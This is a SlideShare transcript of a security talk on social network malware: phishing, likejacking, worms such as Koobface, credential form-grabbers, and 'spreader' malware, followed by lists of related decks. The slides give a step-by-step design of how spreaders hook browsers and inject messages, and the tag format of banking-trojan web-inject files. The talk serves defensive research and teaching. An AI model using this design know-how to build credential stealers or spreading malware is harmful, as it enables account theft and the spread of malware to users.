SlideShare a Scribd company logo

Emerging Trends in Online Social Networks Malware

Aditya K Sood
Aditya K Sood

Emerging trends in Social Networks Malware. Social networks, such as Facebook, Twitter, and others pose a grave threat to the security and privacy of users. This presentation highlights malware infection strategies used by attackers to infect social networking websites and addresses security from the user perspectives—outlining effective, secure steps that can reduce the impact of malware infections

1 of 41
Download to read offline
$WHOAMI Aditya K Sood  Senior Consultant at IOActive: http://ioactive.com/  Others  Worked previously for Armorize, Coseinc and KPMG  Active Speaker at Security conferences  Written Content – IEEE Magazine/ Virus Bulletin/ ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NESE|CFS  Personal Website:  LinkedIn : http://www.linkedin.com/in/adityaks  Website: http://www.secniche.org  Blog: http://secniche.blogspot.com Coordinated Research  Rohit Bansal, Cyber Security Division, PMO INDIA  Dr. Richard J Enbody, Associate Professor, Michigan State University About IOActive Established in 1998, IOActive is an industry leader that offers comprehensive computer security services with specializations in smart grid technologies, software assurance, and compliance. Boasting a well-rounded and diverse clientele, IOActive works with a majority of Global 500 companies including power and utility, game, hardware, retail, financial, media, travel, aerospace, healthcare, high-tech, social networking, and software development organizations.
WHOAMI !  The points presented in this talk is completely based on the independent research and does not relate to any of my previous or present employer.  A number of images have been taken from different resources (Sophos, etc.) and others collected during real time analysis  Phishing emails, spam messages, rogue tweets, etc.  Reverse engineering snippets of malware  The demos (videos) are built using compromised malware and real time analysis of different attacks Disclaimer
WHOAMI !  A malicious link is served on OSNs  Users follow that link and gets infected with malware Question – Who is responsible?  OSN Vendors for serving that link  Users for following that link  Browsers for getting exploited  Third-party plugins (Java, Adobe, etc.) for inherent vulnerabilities  Anti-virus vendors for not detecting the malware  IPS/IDS for failing to detect the data exfiltration Social Networks – Malware Paradigm !
WHOAMI ! The Reality !
Conduct operations in a deceptive manner Steal identities and sensitive information Breach privacy Harness the power of inherent design of OSNs Exploit the built-in design model to trigger attacks Automated in nature OSN Malware : Features
Phishing/Spams OSN Scams LikeJacking/ClickJacking Rogue Applications and Profiles (Facebook, Twitter etc.) Sponsored Advertisements and Malvertisements Worms Socioware Emerging Trends : History to Now…
 OSNs User Base  Facebook  1.05 Billion  Refer: Facebook quarterly earning – Q-4  http://www.scribd.com/doc/123034877/Facebook-Q4-2012-Investor-Slide-Deck Users are the Assets !
WHOAMI ! OSNs User Base  Twitter – 465 Million and reached 500 Million recently  Refer: http://blog.sironaconsulting.com Users are the Assets !
 Barracuda Study (2012)  - http://www.barracudalabs.com/fbinfographic/ Analytics !
Chain Exploitation—Social Networks Malware  - http://www.isaca.org/Journal/Past-Issues/2011/Volume-1/Pages/Chain- Exploitation-Social-Networks-Malware.aspx OSN Chain Infection !
WHOAMI ! Online Social Network Malware - Trends
WHOAMI ! Phishing  Old school tactic but amazingly, it still works  Brand name manipulation and social engineering  Exploits ignorance and doubt among OSN users  Extensively used for conducting drive-by-download attacks Trend (1) – Phishing (Facebook)
WHOAMI ! Trend (1) – Phishing (Twitter)
WHOAMI !  Used in Surveys Scams  URL shortener services are very fruitful  Hiding targets  Serving exploits  Redirections on the fly Trend (1) – Spamming (Twitter)
WHOAMI !  Illegitimate surveys and polls  Spreading malware  Stealing users information Trend (2) – Scams
WHOAMI ! Note: A number of fake facebook profiles even exist for more than a year. Trend (3) – Fake Profiles
WHOAMI ! Trend (4) – Malicious Applications
WHOAMI ! Trend (5) – Malvertisement
WHOAMI ! Koobface (2009-2010)  Inject malicious content in wall posts. Hoax warnings  Sending emails to inboxes of the registered Facebook’s users  Chain infection to distribute koobface malware to a large set of users  Also used stolen Facebook credentials for malicious purposes Likejacking Worm (2010 -2012)  Injecting malicious links  To raise ratings by triggering unauthorized likes Trend (6) – Worms
WHOAMI ! Lily Jade (2012)  Exploits Crossrider web API to build plugin to attack different browsers  Uses jquery to send malicious messages Ramnit Worm (2010 - 2012)  Stolen Facebook accounts’ credentials are used to deliver malicious messages through compromised accounts Trend (6) – Worms (cont…)
WHOAMI !  Injecting malicious links with likes  Manipulating the implementation of like functionality  Very effective in tricking users to follow the likes  Earlier, used to spread malware but now:  It has become a legitimate business model. Amazing !  For $5, one can get a number of likes ! Trend (7) – Likejacking/ Clickjacking
WHOAMI !  This demo shows how LikeJacking was conducted earlier to trigger infections in Facebook  It worked when Facebook did not implement any confirmation button  The newly deployed code actually restricts the active implementation of this attack, but it is not the complete solution.  A new variant of LikeJacking code can be expected in the near future. LikeJacking/Clickjacking Demo (Facebook)
WHOAMI !  Stealing OSN specific user credentials  Hooks browser to capture all the POST request used for submitting forms  HTTP POST requests carry accounts credentials  OSN specific account credentials are used earlier for building worms  Example: Koobface  Details on Form-grabbing technique:  http://www.virusbtn.com/virusbulletin/archive/2011/11/vb201111- form-grabbing Trend (8) – Identity Stealing (Grabbers)
WHOAMI !  A bot having built-in functionality to capture OSN data is installed in the testing environment  Facebook website is opened and credentials are provided  The bot steals the user credentials OSN Grabber (Demo)
 Malware targeting OSN from end user machines  Malware exploiting OSNs functionality in an automated manner  Virtually, turns your friends into frenmies  Exploit users by compromising  Identity  Privacy  Completely deceptive in nature Socioware Online Social Networks Malware Trend (9) - Socioware
WHOAMI ! Socioware  A class of malware explicitly use to spread infections across different OSNs (Facebook, Twitter, etc.)  Primarily developed as built-in components of bots.  Named as SPREADERS in the underground economy  Explicitly used for building OSN worms  Subverts capabilities of OSNs to distribute malware to a large sections of users How ?  Based on Man-in-the-Browser (MitB) paradigm  Triggering infections from already infected machines  Browsers are hooked and OSN web pages are injected  Exploit trust model that exists between users Trend (9) – Inside Socioware
Understanding Socioware – Targeting Facebook Online Chat
WHOAMI ! Facebook Chat – Infections !
 Creating malicious Facebook application and embedding Java applet that triggers drive-by-download to install spreader  Using exiting botnet to upload infected machines with spreaders  Pay-per infection (PPI) with Browser exploit Packs (BEPs) to infect websites to distribute spreaders  Using USB devices to distribute spreaders physically Spreaders – Distribution !
 Executable (Injection Engine) : The primary logic file that spreads malicious messages  Status Notification Component: The executable updates about the status of the injection (success/failure)  Link Storage Component: It stores the different injection ( URLs) to be injected by the executable  Time Interval Component: A logic which decides when to inject the malicious link based on the timing Spreaders – Components !
 Step 1 - Installed in the end users’ machines  Step 2 – Hooks browser libraries and controls HTTP communication channel  Step 3 – Remains dormant and starts monitoring engine to detect OSN surfing through browsers  Step 4 - On successful detection, triggers internal logic to find pattern in the web page  Step 5 – Read the malicious message from file (or internally) for injection  Step 6 – Triggers injection and notify the state (success or failure to C&C)  Step 7 – Deactivates itself for a few minutes and starts infecting again Spreaders – Internal Design
WHOAMI !  Spreader is installed in the controlled virtual environment  Facebook website is opened and credentials are provided  Facebook chat is activated to send messages to friends  Spreader injects malicious messages after a given time interval Spreaders Demo
WHOAMI !  Automated way to inject unauthorized content in HTTP responses  Technique works as:  Hijacking the communication channel of browsers  Manipulating the low level HTTP protocol libraries used by browsers  Primarily aimed for: ─ Stealing information from banking websites on end user machines Socioware - Universal Web Injects
WHOAMI !  set_url [target webpage URL] * GP  Setting the target web page to inject  For all HTTP requests G = GET & P=POST  data_before/ data_end tag  Setting the required data in the web page before injected content  data_inject/ data_end tag  Data to inject in the web page  data_before/ data_end tag  Setting the required data in the web page after the injected content Socioware - Universal Web Injects
WHOAMI ! Socioware - Universal Web Injects
WHOAMI ! Immune System  Users feedback on the channel that is used by malware as a launchpad  Based on message classifier which identify users as infected with malware when the classifier marked messages as shady in collaboration with feedback provided by the users' friends  User marking in conjunction with URL characteristics and features  Refer: http://research.microsoft.com/en-us/projects/ldg/a10-stein.pdf Traffic Analyzer  Crawling every possible URL  Resolving DNS entries and checking against blacklists  It requires resolving of URL shortners too Facebook Built-in Protection
WHOAMI ! Why end users and client side software are still the priority targets? Point to Ponder !
WHOAMI !  OSN will remain the centralized target for distributing malware  Trend of automated infections against OSN will continue  Significant increase in socioware based crimeware services  Possibility of advanced likejacking attacks  Socioware attacking mobile platforms Future !
WHOAMI ! Questions !
 To all my team members  IOActive for its continuous support  Secure 360 team for giving me an opportunity to speak Thanks !

Recommended

Social networking-website-security-mitigation
Social networking-website-security-mitigationSocial networking-website-security-mitigation
Social networking-website-security-mitigationbipinsunar
 
Facebot
FacebotFacebot
FacebotPuN1sh3r_1
 
Fb Another Breach In The Wall
Fb Another Breach In The WallFb Another Breach In The Wall
Fb Another Breach In The WallConstantin Cocioaba
 
Mapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public RelationsMapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public Relationsmctripletwo
 
Mapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public RelationsMapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public Relationsmctripletwo
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
 
Empowerment technology lesson 1
Empowerment technology lesson 1 Empowerment technology lesson 1
Empowerment technology lesson 1
JeffreyMetrillo
 
When developer's api simplify user mode rootkits developing.
When developer's api simplify user mode rootkits developing.When developer's api simplify user mode rootkits developing.
When developer's api simplify user mode rootkits developing.
Yury Chemerkin
 

Recommended

Social networking-website-security-mitigation
Social networking-website-security-mitigationSocial networking-website-security-mitigation
Social networking-website-security-mitigationbipinsunar
 
Facebot
FacebotFacebot
FacebotPuN1sh3r_1
 
Fb Another Breach In The Wall
Fb Another Breach In The WallFb Another Breach In The Wall
Fb Another Breach In The WallConstantin Cocioaba
 
Mapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public RelationsMapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public Relationsmctripletwo
 
Mapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public RelationsMapping The Consequences Of Technology On Public Relations
Mapping The Consequences Of Technology On Public Relationsmctripletwo
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
 
Empowerment technology lesson 1
Empowerment technology lesson 1 Empowerment technology lesson 1
Empowerment technology lesson 1
JeffreyMetrillo
 
When developer's api simplify user mode rootkits developing.
When developer's api simplify user mode rootkits developing.When developer's api simplify user mode rootkits developing.
When developer's api simplify user mode rootkits developing.
Yury Chemerkin
 
Social networks security risks
Social networks security risksSocial networks security risks
Social networks security risksosuhaibany
 
Using Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University ApplicationsUsing Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University ApplicationsJoseph Labrecque
 
Facebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic WalletFacebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic Wallet
Jonathan Laba
 
Facebook
FacebookFacebook
Facebook
STOBARTEVANS
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaUmut Baris Akkaya
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-OnsAbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
achettih
 
Creative commons
Creative commonsCreative commons
Creative commons
Jemimah Sukbat
 
Web 2.o as facebook
Web 2.o as facebookWeb 2.o as facebook
Web 2.o as facebook
Syed Zaidi
 
Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008
Prescient Digital Media
 
11 web 2.0 and 3.0
11 web 2.0 and 3.011 web 2.0 and 3.0
11 web 2.0 and 3.0Nymphea Saraf
 
Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...
ijwscjournal
 
DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)
Digital Health Coalition
 
Social Content Tool is here!
Social Content Tool is here!Social Content Tool is here!
Social Content Tool is here!
Iva Kolevová
 
Microblogging
MicrobloggingMicroblogging
Microblogginguday p
 
Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014
Stephen Andriole
 
Team 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 LinkdinTeam 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 Linkdin
anirvansen
 
Web 2.0 In The Enterprise
Web 2.0 In The EnterpriseWeb 2.0 In The Enterprise
Web 2.0 In The Enterprise
Lyndon Cerejo
 
Building on Social Application Platforms
Building on Social Application PlatformsBuilding on Social Application Platforms
Building on Social Application Platforms
Jonathan LeBlanc
 
Fyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-slsFyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-sls
Franky Redant
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 

More Related Content

What's hot

Social networks security risks
Social networks security risksSocial networks security risks
Social networks security risksosuhaibany
 
Using Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University ApplicationsUsing Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University ApplicationsJoseph Labrecque
 
Facebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic WalletFacebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic Wallet
Jonathan Laba
 
Facebook
FacebookFacebook
Facebook
STOBARTEVANS
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaUmut Baris Akkaya
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-OnsAbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
achettih
 
Creative commons
Creative commonsCreative commons
Creative commons
Jemimah Sukbat
 
Web 2.o as facebook
Web 2.o as facebookWeb 2.o as facebook
Web 2.o as facebook
Syed Zaidi
 
Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008
Prescient Digital Media
 
Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...
ijwscjournal
 
DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)
Digital Health Coalition
 
Social Content Tool is here!
Social Content Tool is here!Social Content Tool is here!
Social Content Tool is here!
Iva Kolevová
 
Microblogging
MicrobloggingMicroblogging
Microblogginguday p
 
Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014
Stephen Andriole
 
Team 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 LinkdinTeam 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 Linkdin
anirvansen
 
Web 2.0 In The Enterprise
Web 2.0 In The EnterpriseWeb 2.0 In The Enterprise
Web 2.0 In The Enterprise
Lyndon Cerejo
 
Building on Social Application Platforms
Building on Social Application PlatformsBuilding on Social Application Platforms
Building on Social Application Platforms
Jonathan LeBlanc
 
Fyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-slsFyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-sls
Franky Redant
 

What's hot (20)

Social networks security risks
Social networks security risksSocial networks security risks
Social networks security risks
 
Using Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University ApplicationsUsing Collaborative Media Services with Flash in University Applications
Using Collaborative Media Services with Flash in University Applications
 
Facebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic WalletFacebook Open Graph - The Semantic Wallet
Facebook Open Graph - The Semantic Wallet
 
Facebook
FacebookFacebook
Facebook
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris Akkaya
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-OnsAbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
AbusingExploitingAndPWN-ingWithFirefoxAdd-Ons
 
Creative commons
Creative commonsCreative commons
Creative commons
 
Web 2.o as facebook
Web 2.o as facebookWeb 2.o as facebook
Web 2.o as facebook
 
Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008Intranet 2.0 Webinar Oct 2008
Intranet 2.0 Webinar Oct 2008
 
11 web 2.0 and 3.0
11 web 2.0 and 3.011 web 2.0 and 3.0
11 web 2.0 and 3.0
 
Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...Semantic web approach towards interoperability and privacy issues in social n...
Semantic web approach towards interoperability and privacy issues in social n...
 
DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)DHC Klick Social Media Landscape Q1 2013 Summary (c)
DHC Klick Social Media Landscape Q1 2013 Summary (c)
 
Social Content Tool is here!
Social Content Tool is here!Social Content Tool is here!
Social Content Tool is here!
 
Microblogging
MicrobloggingMicroblogging
Microblogging
 
Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014Social Media Speaks Out - July 2014
Social Media Speaks Out - July 2014
 
Team 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 LinkdinTeam 3 Web 2.0 Web 3.0 V2 Linkdin
Team 3 Web 2.0 Web 3.0 V2 Linkdin
 
Web 2.0 In The Enterprise
Web 2.0 In The EnterpriseWeb 2.0 In The Enterprise
Web 2.0 In The Enterprise
 
Building on Social Application Platforms
Building on Social Application PlatformsBuilding on Social Application Platforms
Building on Social Application Platforms
 
Fyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-slsFyronic seminar-software factorymeeting-sls
Fyronic seminar-software factorymeeting-sls
 

Similar to Emerging Trends in Online Social Networks Malware

Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
The Corporate Web Security Landscape
The Corporate Web Security LandscapeThe Corporate Web Security Landscape
The Corporate Web Security Landscape
Peter Wood
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
Nilesh Sapariya
 
IRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social NetworkIRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social Network
IRJET Journal
 
CYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportCYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportChris Taylor
 
Resume
ResumeResume
Resume
Nick Bilogorskiy
 
Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...UltraUploader
 
Vulnerabilities and attacks targeting social networks and industrial control ...
Vulnerabilities and attacks targeting social networks and industrial control ...Vulnerabilities and attacks targeting social networks and industrial control ...
Vulnerabilities and attacks targeting social networks and industrial control ...
ijcsa
 
A literature survey on anti phishing
A literature survey on anti phishingA literature survey on anti phishing
A literature survey on anti phishing
IJCSES Journal
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
Behrouz Sadeghipour
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert TrendSC Leung
 
Continuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docxContinuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docx
richardnorman90310
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
 
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITYTECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
ijistjournal
 
A .net developer experiences with web2.0 and social media
A .net developer experiences with web2.0 and social mediaA .net developer experiences with web2.0 and social media
A .net developer experiences with web2.0 and social mediaRoy Lachica
 
IRJET- Phishing Web Site
IRJET- Phishing Web SiteIRJET- Phishing Web Site
IRJET- Phishing Web Site
IRJET Journal
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & SocialUnlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
daniatrappit
 

Similar to Emerging Trends in Online Social Networks Malware (20)

Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
The Corporate Web Security Landscape
The Corporate Web Security LandscapeThe Corporate Web Security Landscape
The Corporate Web Security Landscape
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
IRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social NetworkIRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social Network
 
CYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportCYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_Report
 
Resume
ResumeResume
Resume
 
Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...
 
Vulnerabilities and attacks targeting social networks and industrial control ...
Vulnerabilities and attacks targeting social networks and industrial control ...Vulnerabilities and attacks targeting social networks and industrial control ...
Vulnerabilities and attacks targeting social networks and industrial control ...
 
A literature survey on anti phishing
A literature survey on anti phishingA literature survey on anti phishing
A literature survey on anti phishing
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
3 Hkcert Trend
3 Hkcert Trend3 Hkcert Trend
3 Hkcert Trend
 
Continuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docxContinuing in your role as a human service provider for your local.docx
Continuing in your role as a human service provider for your local.docx
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
 
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITYTECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
 
A .net developer experiences with web2.0 and social media
A .net developer experiences with web2.0 and social mediaA .net developer experiences with web2.0 and social media
A .net developer experiences with web2.0 and social media
 
IRJET- Phishing Web Site
IRJET- Phishing Web SiteIRJET- Phishing Web Site
IRJET- Phishing Web Site
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser security
 
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & SocialUnlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
Unlimited Attempts AllowedDetailsVirtual Labs Sniffing & Social
 

More from Aditya K Sood

Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB Instances
Aditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in Elasticsearch
Aditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
Aditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
Aditya K Sood
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Aditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and Defences
Aditya K Sood
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
Aditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
Aditya K Sood
 
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...
Aditya K Sood
 
ToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android InfectionsToorCon 14 : Malandroid : The Crux of Android Infections
ToorCon 14 : Malandroid : The Crux of Android Infections
Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Aditya K Sood
 
NGR Bot Analysis Paper
NGR Bot Analysis PaperNGR Bot Analysis Paper
NGR Bot Analysis Paper
Aditya K Sood
 
